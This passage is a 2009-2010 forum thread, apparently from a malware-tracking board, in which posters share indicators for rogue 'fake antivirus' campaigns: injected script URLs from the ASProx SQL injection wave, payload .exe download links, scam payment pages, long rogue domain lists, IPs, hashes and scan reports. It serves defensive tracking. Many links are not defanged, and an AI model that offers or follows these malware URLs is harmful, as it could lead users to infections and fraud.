mnt-routes:     NETDIRECT-MNT
mnt-by:         NETDIRECT-MNT
source:         RIPE # Filtered

organisation:   ORG-nA8-RIPE
org-name:       netdirect
org-type:       LIR
address:        netdirekt e. K.
                Kleyer Strasse 79 / Tor 14
                60326 Frankfurt
                Germany
phone:          +49 69 90556880
fax-no:         +49 69 905568822
admin-c:        SR614-RIPE
admin-c:        WW200-RIPE
mnt-ref:        NETDIRECT-MNT
mnt-ref:        RIPE-NCC-HM-MNT
mnt-by:         RIPE-NCC-HM-MNT
source:         RIPE # Filtered

Title: Re: Rogue - Fake AV
Post by: SysAdMini on October 01, 2009, 03:25:15 pm
New campaign.

Code: [Select]
www.adtcp.ru/ads.js
Don't click on the search results !!

http://www.google.com/#hl=en&q=script+src%3Dwww.adtcp.ru&start=10&sa=N&fp=1&cad=b
Title: Re: Rogue - Fake AV
Post by: SysAdMini on October 01, 2009, 04:11:31 pm
New campaign.

Code: [Select]
www.adtcp.ru/ads.js
Don't click on the search results !!

http://www.google.com/#hl=en&q=script+src%3Dwww.adtcp.ru&start=10&sa=N&fp=1&cad=b

Just found on Gary Warner's blog

Six Million? or is it 188 Million? Compromised Webpages
http://garwarner.blogspot.com/2009/10/cyber-security-awareness-month-day-one.html

Quote
Last night we received word that the ASProx SQL injection attack was back in full swing. After several months of no activity, this botnet is back to its old tricks of attacking vulnerable the ASP pages on IIS Servers trying to add a malicious javascript link to legitimate webpages by manipulating the underlying Microsoft SQL servers.

The main site which is hosting the malicious code right now is "ads-t.ru". Sites which have been hacked by this attack tool will contain a tag which leads to the page "ads-t.ru/ads.js". A quick Google search for this string will currently reveal more than 6.5 Million webpages which have had this code injected.

The Javascript causes an IFRAME to be loaded which causes the following file to be loaded:
adtcp.ru/ad/index.php
Title: Re: Rogue - Fake AV
Post by: RS-232 on October 01, 2009, 07:00:02 pm
Some more info about the recent Asprox attacks...
http://phil-secu.over-blog.net/article-36697187.html
Title: Re: Rogue - Fake AV
Post by: SysAdMini on October 01, 2009, 07:18:39 pm
Some more info about the recent Asprox attacks...
http://phil-secu.over-blog.net/article-36697187.html

The article mentions the low detection rate of the pdf exploit.
This is the current status:
https://www.virustotal.com/analisis/697993b5e5e7d882aa66a8ccef66363b22439bcf770513c2800c6de136c2a164-1254424431
McAfee   5758   2009.10.01   Exploit-PDF.q.gen!stream
McAfee+Artemis   5758   2009.10.01   Exploit-PDF.q.gen!stream
Sophos   4.45.0   2009.10.01   Troj/PDFJs-DJ
Sunbelt   3.2.1858.2   2009.10.01   Exploit.PDF-JS.Gen (v)
Title: Re: Rogue - Fake AV
Post by: SysAdMini on October 01, 2009, 07:33:28 pm
TE report of the pdf payload
http://www.threatexpert.com/report.aspx?md5=a44f0a660223e92d3119d49e5fce20ef

VT 6/41
http://www.virustotal.com/analisis/7d01a99514d5c2b6c5f8c81b0aa8c697b869c87d7f0f66797d6f2319c07d67cf-1254425485
AntiVir   7.9.1.27   2009.10.01   TR/FraudPack.ams
F-Secure   8.0.14470.0   2009.10.01   Suspicious:W32/Malware!Gemini
McAfee+Artemis   5758   2009.10.01   Artemis!A44F0A660223
McAfee-GW-Edition   6.8.5   2009.10.01   Trojan.FraudPack.ams
Microsoft   1.5101   2009.10.01   VirTool:Win32/Obfuscator.FI
Rising   21.49.22.00   2009.09.30   Packer.Win32.UnkPacker.a
Title: Re: Rogue - Fake AV
Post by: RS-232 on October 02, 2009, 09:24:32 am
...based on the TE reports above,some of them already added - you're faster than me...  ;)

Result: 12/41 (29.27%)
http://www.virustotal.com/analisis/4487fbec24ab08491e1e5272ed6079ab82dd081ecbcf1915cc805499214978fb-1254474418

Quote
hxxp://linkertagubert.com/apw1f1Vj0K3F0vdR4Ew7Xl -> already listed...
hxxp://okavanubares.com/apw1f1Vj0K3F0vdR4Ew7Xl -> already listed...
hxxp://buleropihertan.com/apw1f1Vj0K3F0vdR4Ew7Xl -> already listed...
hxxp://konitorsabure.com/apw1f1Vj0K3F0vdR4Ew7Xl
hxxp://ofaderhabewuit.com/apw1f1Vj0K3F0vdR4Ew7Xl
hxxp://uvgaderbotario.com/apw1f1Vj0K3F0vdR4Ew7Xl

Code: [Select]
linkertagubert.com   69.10.61.243
okavanubares.com     69.10.61.244
buleropihertan.com   69.10.61.245

linkertagubert.com   74.86.145.48
okavanubares.com     74.86.145.49
buleropihertan.com   74.86.145.50

ofaderhabewuit.com   66.79.179.44
konitorsabure.com    66.79.179.45
uvgaderbotario.com   66.79.179.46

A "lonesome" one of the same...69.10.40.163:
Quote
hxxp://dabertugaburav.com/apw1f1Vj0K3F0vdR4Ew7Xl

Quote
hxxp://ertonaferdogalo.com/apw1f1Vj0K3F0vdR4Ew7Xl -> 204.12.226.67 (and/or) 204.27.58.230...
hxxp://ertugasedumil.com/apw1f1Vj0K3F0vdR4Ew7Xl    -> 204.12.226.68 (and/or) 204.27.58.231...
hxxp://ertunagertos.com/apw1f1Vj0K3F0vdR4Ew7Xl      -> 204.27.58.232
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on October 03, 2009, 10:05:05 am

directs to fake av:
Code: [Select]
buenavistasocialclub.cn/go.php?id=2004&key=ff0057594&p=1
writeloveonherarms.cn/go.php?id=2035&key=6165353a7&p=1
friedgreentomatoes.cn/go.php?id=2035&key=6165353a7&p=1
decoratingcatalog.cn/go.php?id=2035&key=6165353a7&p=1

fake av - personal antivirus:
Code: [Select]
liveantimalwareproscanv2.com/uninstall_pav.exe
fraudulent payment page:
Code: [Select]
https://secure.personalpurchuaseweb.com
https://secure.online-soft-payments.com/buy.php
https://online-soft-payments.com/buy.php
https://computerguardsoft.com/buy.php
https://secure.computerguardsoft.com/billing/?product=PAV

some new registration over the past few days:
Code: [Select]
1mytotalscan.com
antispywarecomputerscan01.com
antispywarecomputerscan07.com
antispywarecomputerscan14.com
antispywarecomputerscan16.com
antispywarecomputerscan8.com
computer-antivirus03.com
computer-antivirus06.com
computer-antivirus16.com
computer-antivirus19.com
computer-antivirus8.com
computer-protection00.com
computer-protection03.com
computer-protection18.com
computer-protection23.com
computer-protection9.com
computer-scanner02.com
computer-scanner12.com
computer-scanner21.com
computervirusscanner31.com
myantispywarecheck00.com
myantispywarecheck07.com
myantispywarecheck11.com
myantispywarecheck17.com
myantispywarecheck2.com
mycompinfo17.com
mycompinfo23.com
mycompinfo3.com
mycompscanner.com
mycompscanner02.com
mycompscanner07.com
mycompscanner12.com
mycompscanner22.com
mycompscanner31.com
mycompscanner42.com
mycomputerbestscan11.com
my-computer-check01.com
my-computer-check03.com
my-computer-check15.com
my-computer-check24.com
mycomputerfastscan11.com
mycomputerlivescan2.com
mycomputerproscan11.com
my-computer-scan43.com
mycomputer-scanner1a.com
mycomputer-scannerp.com
mycomputer-scannervv.com
mycomputersecurescan2.com
mycomputersvirscan2.com
mycomputertotalscan2.com
mycomputertotalscann11.com
mycomputerwinscan11.com
mycomputerwinscan2.com
myspyware-scan08.com
myspyware-scan12.com
myspyware-scaner9.com
myspyware-scanner2.com
mytotalscan11.com
mytotalscan16.com
mytotalscanner.com
mytotalscanner17.com
myvirusscanner2.com
myvirusscanner25.com
pc-scan23.com
pc-scanner13.com
pc-scanner16.com
pc-scanner23.com
pcvirusscan2.com
totalcomputerscan12.com
advancedvirusscan.com
advanedprovirusscan.com
computeron-linescan03.com
internetantivirusproscan.com
internetantivirusproscanner.com
internet-antivirus-scan.com
internet-antivirus-scanner.com
internetsecurityscan.com
mycomputeronlinescan04.com
mycomputeronlinescan06.com
mycomputeronlinescan08.com
mycomputeronlinescan09.com
mycomputeronlinescan11.com
securewinupdatesv3.com
securitybugfixupdate6.com
windowsdefenderupdate5.com
windowsprotectionupdate4.com
winsecurityupdatesv2.com
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on October 03, 2009, 10:31:58 am
winwebsecurity fake av:
Code: [Select]
securitytestinternetguide.com/download.php
securitytestinternetguide.com/install/ws.exe
webbiztest.com/download.php
webbiztest.com/install/ws.exe
netmedtest.com/download.php
netmedtest.com/install/ws.exe
securitycodereviews.com/download.php
securitycodereviews.com/install/ws.exe

http://www.malwaredomainlist.com/mdl.php?inactive=on&sort=Date&search=php?affid=&colsearch=All&ascordesc=DESC&quantity=500&page=0

same:
Code: [Select]
astrologia.org.pl/downloads/install2.exe
other fake av:
Code: [Select]
windowspc-defender.com
Title: Re: Rogue - Fake AV
Post by: SysAdMini on October 04, 2009, 08:17:11 am
New campaign.

Code: [Select]
www.adtcp.ru/ads.js

Another one
Code: [Select]
adbnr.ru/ads.js
Title: Re: Rogue - Fake AV
Post by: SpiderLover on October 11, 2009, 03:00:41 pm
Code: [Select]
av-payment.com/choose
Rogue AV Payment page
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on October 17, 2009, 03:55:42 pm
rogue fakeplus downloader

payload: /installer.1.exe

Code: [Select]
cleanvirusesonline.info
hagnuor.cn
gokzed.cn
golary.cn
gombely.cn
gorazyn.cn
gudxyv.cn
gyfvuxe.cn
gymarqe.cn
hahdyti.cn
hiqtacy.cn
icepot.cn
idoafy.cn
idoape.cn
idunef.cn
ifueme.cn
ifypeod.cn
igafep.cn
igakuot.cn
igayzde.cn
igeuvat.cn
igivor.cn
igoudix.cn
igouhxe.cn
iguyzmo.cn
igycoat.cn
ihaegup.cn
ihaerxi.cn
ihagoin.cn
ihoekag.cn
ihogedi.cn
ihouvi.cn
ihuere.cn
ihuqoyr.cn
ijaheuw.cn
ijakony.cn
ijazofy.cn
ijeife.cn
ijelodi.cn
ijepiyq.cn
ijesiam.cn
ijobuaw.cn
ijuebka.cn
ijuoxe.cn
ijyadpi.cn
ijyoxri.cn
ikaocy.cn
ikayvo.cn
ikeuqe.cn
ikeysi.cn
ikioda.cn
ikoiwe.cn
ikorate.cn
ikuaxge.cn
ikyadeh.cn
ikyigy.cn
ileufby.cn
ilipyw.cn
ilixyeq.cn
ilodux.cn
iloefe.cn
iluefot.cn
iluise.cn
ilyocij.cn
ilyqous.cn
inagyve.cn
ineigta.cn
inejayf.cn
ineoky.cn
ineuho.cn
iniecyb.cn
iniegox.cn
iniohi.cn
iniwuv.cn
inyelu.cn
inyxode.cn
ipaliky.cn
ipaugli.cn
ipemuw.cn
ipisuw.cn
ipoxyid.cn
iqaotfy.cn
iqevun.cn
iqewano.cn
iqiatwo.cn
iqidoh.cn
iqoakpi.cn
iqoyxab.cn
iqywauf.cn
iraqicu.cn
ireigma.cn
ireoze.cn
irexaym.cn
irileto.cn
iriumjo.cn
irozup.cn
isepihy.cn
isyoti.cn
itevyx.cn
ituyxe.cn
ivehod.cn
iveigyr.cn
ivobudy.cn
ivofah.cn
ivuxiaq.cn
ivuywu.cn
iwagily.cn
iwaunom.cn
iwipyje.cn
iwuoxo.cn
iwuveoc.cn
iwyhuda.cn
ixejos.cn
ixohiyr.cn
ixouwes.cn
ixozure.cn
ixuyna.cn
ixuzywe.cn
izaheis.cn
izaywur.cn
izesoz.cn
jabdup.cn
jasfezu.cn
jatokfi.cn
jegaqe.cn
jemjouw.cn
jenpyoj.cn
jestuab.cn
jewymvi.cn
jidkeyt.cn
jifekwy.cn
jimzeky.cn
jiscean.cn
jiwhopa.cn
jizkulo.cn
jugawa.cn
julxyaf.cn
jutyja.cn
juwciol.cn
juzsaon.cn
jychape.cn
jyfugo.cn
jygoto.cn
jymavco.cn
jymzowi.cn
jynoqi.cn
jypfeov.cn
jytsit.cn
jyvalew.cn
jywamfe.cn
jywqiva.cn
jywuxiv.cn
jyxipat.cn
kadefpu.cn
kadeni.cn
kalepod.cn
kanvyz.cn
kaxuze.cn
moshiz.cn
rerikhy.cn


other rogue:

Code: [Select]
waluesecadds.com
systemicoptimizer.com
personalguard2009.com
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on October 17, 2009, 04:04:38 pm
trojan fakescanti (WinAntivirusPro)

exploits:
Code: [Select]
seo-traff.com/counters/3/index.php
seo-traff.com/counters/3/allExact.pdf

trojan fakescanti:
Code: [Select]
seo-traff.com/counters/3/update.php
liberty cp:
Code: [Select]
seo-traff.com/counters/3/admin.php

trojan fakescanti:
Code: [Select]
core2842.pictureviewes.com/stget2.cgi?host=host&id=2842
payment page:

Code: [Select]
secure.secureorder-3.com/signup.cgi
secureorder-3.com/signup.cgi
pictureviewes.com/signup.cgi
openbiglibrarynow.com/signup.cgi
payforyounow.com/signup.cgi
letsworknowx.com/signup.cgi
iwant-x.com/signup.cgi
protectyourpc-todayx.com/signup.cgi
protectyourpc-fastsx.com/signup.cgi
protectyourpc-againx.com/signup.cgi
protectyourpc-nowx.com/signup.cgi
takemypaymentsx.com/signup.cgi
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on October 19, 2009, 08:18:26 am
related to AdvancedVirusRemover

fake scan page:
Code: [Select]
best-scan-pc.net/vista/
rogue av downloader
Code: [Select]
best-scan-pc.net/cgi-bin/load.pl
xxx-white-tube.net/cgi-bin/flashpatch.pl

trojan
Code: [Select]
downloadavr6.com/dfghfghgfj.dll
downloadavr6.com/cgi-bin/download.pl

rogue main site
Code: [Select]
advanced-virus-remover-2009.com
advanced-virus-remover2009.com
advanced-virusremover-2009.com
advanced-virusremover2009.com
advancedvirusremover-2009.com
advancedvirus-remover2009.com
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on November 06, 2009, 09:22:00 am
MaCatte not McAfee:

Code: [Select]
macatte.com
share IP with the Rogue GreenAVPro family
http://www.malwareurl.com/listing.php?domain=macatte.com
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on November 06, 2009, 09:32:02 am
a red flag for this one: http://www.siteadvisor.pl/sites/macatte.com

http://bharath-m-narayan.blogspot.com/2009/11/macatte.html
http://threatinfo.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=TROJ_FAKEAV.TUL&VSect=T
Title: Re: Rogue - Fake AV
Post by: sriramp on November 09, 2009, 12:15:34 am
This Rogue is currently Live

Code: [Select]
http://webviruscheck5.com/download/Inst_312s1.exe
Title: Re: Rogue - Fake AV
Post by: Curson on February 14, 2010, 05:35:02 pm
Hi all,

Code: [Select]
http://homeamateurclips.com/video/video.exeFake av with TDL3.

Main page :
Code: [Select]
http://hqexgirl.osa.pl
Greetings.
Title: Re: Rogue - Fake AV
Post by: wexxlar on February 19, 2010, 03:14:37 pm
Code: [Select]
http://91.212.132.241/download/Setup_28.exehttp://www.virustotal.com/analisis/58bc59772df8e363a18fa0ac484f1452843f7d7c713cc39d7c6a82290d42e28e-1266591562

Title: Re: Rogue - Fake AV
Post by: Curson on February 20, 2010, 11:13:39 pm
Hi,

New Fake Av Desktop Security 2010
Code: [Select]
http://windesktopsecurity.com/SecurityInstall.exe
Affiled site :
Code: [Select]
http://allshouldbedone.in
Greetings.
Title: Re: Rogue - Fake AV
Post by: jackberri on February 22, 2010, 08:48:11 pm
Fake AV
Code: [Select]
hxxp://characterscaner.cn/pav_db
hxxp://characterscaner.cn/pav_ext
hxxp://characterscaner.cn/pav_hook
hxxp://characterscaner.cn/pav_un
hxxp://characterscaner.cn/pav_main
Title: Re: Rogue - Fake AV
Post by: doomrainer on February 23, 2010, 03:13:17 pm
Currently active:

http://91[.]212[.]127[.]252/download/Setup_411[.]exe
http://91[.]212[.]127[.]252/download//download/Setup_103[.]exe


http://www.virustotal.com/analisis/cff397f260e39d5fa326626eb7acde49938ed21c1b52ac6ec70594595060e470-1266934629
http://wepawet.cs.ucsb.edu/view.php?hash=784fa03ce9909842dd5ed518663ce54e&t=1266936206&type=js
http://anubis.iseclab.org/?action=result&task_id=1ab1ee5ffc1eb1b24a5080e64a16951f8&format=html
http://www.robtex.com/ip/91.212.127.252.html#blacklists

File name: Setup_***.exe (The last three characters change)
File size: 230,912 Bytes
MD5: be76806ba943ef01d476031a0abb21c5
Detected as: Trojan.Win32.FakeAV

Enjoy!
Title: Re: Rogue - Fake AV
Post by: doomrainer on February 23, 2010, 06:07:29 pm
Seems to be random php files (not an expert on this behavior)

http://173[.]212[.]228[.]196/8_82ed2e[.]php

http://safeweb.norton.com/report/show?url=173.212.228.196&x=0&y=0
http://www.siteadvisor.com/sites/173.212.228.196
http://www.google.com/safebrowsing/diagnostic?site=173.212.228.196
http://www.virustotal.com/analisis/65f7802a4f319de8fa0a95416767d434116a2291e7a32710f229d18833ae79dd-1266942593
http://anubis.iseclab.org/?action=result&task_id=12a0eb71a94750034edc9704cc1fda73d&format=html

File size: 1,049,600 Bytes
MD5: 8dd1b89ff6cd0a9853dc2865dc0290ef 
Detected as: Trojan.Win32.FakeAV

Enjoy!
Title: Re: Rogue - Fake AV
Post by: SysAdMini on February 23, 2010, 07:50:27 pm
Seems to be random php files (not an expert on this behavior)

http://173[.]212[.]228[.]196/8_82ed2e[.]php


attached decoded sample.

pw: infected
Title: Re: Rogue - Fake AV
Post by: doomrainer on February 25, 2010, 02:09:44 pm
Active and detected as Trojan.FakeAV

http://195[.]5[.]161[.]120/download/Setup_295[.]exe

File size: 239616 bytes
MD5   : 1e3ffe4faf4e3f0246db2f8eefdd317f

http://wepawet.cs.ucsb.edu/view.php?hash=63ab520c2ac5acd2584c6749704af6c5&t=1267104573&type=js
http://www.virustotal.com/analisis/b1283d768f77795bffce6b909f10422818ae1bd7be277b43adbee98bef123205-1267099055
   
Title: Re: Rogue - Fake AV
Post by: S!Ri on March 23, 2010, 05:33:06 pm
Virus Protector pr0n + setup

http://tubess.twilightparadox.com/land/?n=teen&id=1
http://tubess.twilightparadox.com/land/adobe-91633/adobeflashplayerv10.0.45.2.exe
Title: Re: Rogue - Fake AV
Post by: S!Ri on March 23, 2010, 06:33:28 pm
Personal Security
http://c3872131.time-defender9.com/download/Setup_28.exe
Title: Re: Rogue - Fake AV
Post by: S!Ri on March 23, 2010, 09:34:39 pm
Antivirus 7
http://91.212.127.3/download/ASetup_2009.exe

Edit: May be old... but still working
Title: Re: Rogue - Fake AV
Post by: S!Ri on March 24, 2010, 10:53:36 am
CleanUpAntivirus

http://fuko17ro5.xorg.pl/build6_287.php?cmd=sendFile&counter=1&p=p52dcWpsb1%2FCj8bYbnOCdVik12qYVp%2FZatrau4FdlJ%2FJnsWYe3lvWqyopHbCXsmaaGaRbWtqyFPVpJHaotahlFeob1zZytell3FfmqGgnXaHo83LqG1TnaJ1nV2QZGCUZJuSmGpdpJvLnomtpXFqZm5tbGuYYZqcV6SgZm9plmObZGKdYZmaiZSab3y3
Title: Re: Rogue - Fake AV
Post by: S!Ri on April 04, 2010, 10:20:26 pm
Your Protection (Trojan Downloader: downloads rogue + TDSS):
http://booty.crabdance.com/land/adobe-40584/adobeflashplayerv10.0.45.2.exe
Title: Re: Rogue - Fake AV
Post by: S!Ri on April 06, 2010, 06:25:57 am
Script Kiddie Fake AV:
http://user-av2010.tk/
http://userantivirus2010pro.yolasite.com/
Title: Re: Rogue - Fake AV
Post by: S!Ri on April 06, 2010, 10:48:59 am
Rogue-Downloader:
http://rustubexxs.twilightparadox.com/land/adobe-41148/adobeflashplayerv10.0.45.2.exe

downloads: Your Protection rogues +TDSS
http://www.hooksearchup.org/up3/setup
http://findernos.org/up3/install01
Title: Re: Rogue - Fake AV
Post by: S!Ri on April 06, 2010, 11:30:28 am
Your protection + TDSS

http://www.securityletters.com/up3/setup
http://www.securityletters.com/up3/install01
Title: Re: Rogue - Fake AV
Post by: SysAdMini on April 06, 2010, 05:46:31 pm
list of Rogue AV sites registered today

http://pastebin.com/pMqv0WT7
Title: Re: Rogue - Fake AV
Post by: SpiderLover on April 08, 2010, 02:48:37 pm
Installs a variant of the XP Antispyware 2010/XP Security Tool family I believe.
Code: [Select]
http://bitnoora.com/hh/installer_70108.exe
Title: Re: Rogue - Fake AV
Post by: SpiderLover on April 09, 2010, 02:15:30 am
Looks like another site hosting an installer for the XP AntiMalware 2010 family...
Code: [Select]
http://teendoos.com/hh/installer_70108.exe
Title: Re: Rogue - Fake AV
Post by: Curson on April 10, 2010, 12:19:18 am
Rogue-Downloader named "virii cleaner setup"
hxxp://ettmiss.com/download/0bffb6b280da25f431e0568837e0716a/f85b7b377112c272bc87f3e73f10508d/4

Download: Virus Protector
hxxp://www.bestantiv.com/lol_aocsjerbt_aocsjerbt.phtml?get=20ec449778858d3062592f457c0c4d4f


Title: Re: Rogue - Fake AV
Post by: crunchtime on April 13, 2010, 04:13:48 am
Rogue AV: hxxp://dwnk.in/appreg70700.exe
VirusTotal: http://www.virustotal.com/analisis/e49775111177cc82f806e378fee7c1f4cf9690e86d4b3d6f81be2f57932b0e85-1271021506
Other details: Directi domain/beavers.helen@yahoo.com
Title: Re: Rogue - Fake AV
Post by: SpiderLover on April 17, 2010, 07:20:00 pm
Another one from the XP Security Tool family.
Code: [Select]
http://mpprrppmm.com/hh/installer_70108.exe
Title: Re: Rogue - Fake AV
Post by: SpiderLover on April 19, 2010, 01:33:07 am
Fakesmoke/Virus Protector.
Code: [Select]
http://biteco.co.tv/components/flash_installer.exe
Title: Re: Rogue - Fake AV
Post by: SpiderLover on April 19, 2010, 02:21:30 am
Another one from the XP Security Tool family:
Code: [Select]
http://tauvrioaa.com/hh/installer_70108.exe
Title: Re: Rogue - Fake AV
Post by: SpiderLover on April 19, 2010, 06:26:05 pm
Code: [Select]
http://91.188.59.184/main.php?land=44&affid=21700Fake codec page.
Title: Re: Rogue - Fake AV
Post by: SpiderLover on April 23, 2010, 01:19:54 pm
New rogue TrustDoctor.

Fake Scanner Page.
Code: [Select]
http://callme.rideandbuy.in/?8fa37fbad415d6e9bd7ec4578a177071
Fakesmoke/TrustDoctor.
Code: [Select]
http://filesdownload.in/down/3732f9b31cece5374907f816227c13b3e92fb8cf212a14e06ab464573aae260d4bf11ca41065af3995b4162722f0dbf2a5f50e1e5d77f626b1b8bbcd7cb56a63ff2995bcfb5e2c966c94ebd1fa27c3c011047c8ba3eec0cedf48a9f09ab4940b10e239ea92e299419050247df7f27b7aa2acb5f5b98261a4d73cbfd8ec1b85b6c9dfc82108dca2bd908db707af457f56f56781b8287f8e0967bd41668072adad
Title: Re: Rogue - Fake AV
Post by: SpiderLover on April 23, 2010, 03:18:03 pm
Fake Scanner Page.
Code: [Select]
http://91.188.59.190/main.php?land=20&affid=12400
Title: Re: Rogue - Fake AV
Post by: cheezer on May 18, 2010, 08:05:38 pm
www1.bestgardever5.net  - ET TROJAN Potential Gemini/Fake AV Download URL Detected
Title: Re: Rogue - Fake AV
Post by: acb on June 05, 2010, 03:02:17 am
Fake scanner/Rogue AV downloader "PC_protect.exe"

hxxp://core2958.mylivejournalchanel.com/stget2.cgi?host=host&id=2958